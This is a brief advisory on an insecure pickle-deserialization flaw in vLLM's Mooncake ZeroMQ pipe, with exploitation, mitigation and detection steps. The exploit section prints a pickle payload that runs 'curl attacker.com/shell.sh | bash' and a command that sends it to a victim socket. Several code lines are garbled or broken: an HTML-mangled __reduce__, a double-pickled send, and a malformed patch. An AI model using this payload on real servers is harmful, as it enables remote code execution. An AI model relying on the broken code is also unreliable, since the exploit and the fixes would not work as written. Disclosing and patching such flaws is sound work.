How the CVE Works:
The vulnerability in vLLM’s Mooncake integration arises from insecure deserialization via ZeroMQ sockets. The `recv_pyobj()` method in `mooncake_pipe.py` implicitly uses `pickle.loads()` to deserialize data received over unauthenticated ZeroMQ channels. Since these sockets listen on all network interfaces, an attacker can send a malicious pickle payload, leading to arbitrary code execution on the server. This flaw mirrors GHSA-x3m8-f7g5-qhm7, where unsafe deserialization enables RCE. The lack of encryption or authentication exacerbates the risk, allowing remote exploitation without prior access.
DailyCVE Form:
Platform: vLLM
Version: Pre-32b14baf8a1f
Vulnerability: Insecure Deserialization
Severity: Critical
Date: 2025-04-29
What Undercode Say:
Exploitation:
1. Craft a malicious pickle payload:
import pickle, os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ("curl attacker.com/shell.sh | bash",))
payload = pickle.dumps(Exploit())
2. Send payload via ZeroMQ:
python -c "import zmq; ctx=zmq.Context(); s=ctx.socket(zmq.PUSH); s.connect('tcp://victim:5555'); s.send_pyobj(payload)"
Mitigation:
1. Patch `mooncake_pipe.py` to disable pickle:
def recv_pyobj(): return json.loads(self.recv()) Replace pickle with JSON
2. Restrict ZeroMQ to localhost:
self.socket.bind("tcp://127.0.0.1:5555")
3. Validate sender IPs:
if peer_ip not in ALLOWED_IPS:
raise SecurityError("Unauthorized connection")
Detection:
- Monitor suspicious ZeroMQ connections:
netstat -tulnp | grep 5555
- Audit logs for large pickle payloads:
grep -r "pickle.loads" /var/log/vllm
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
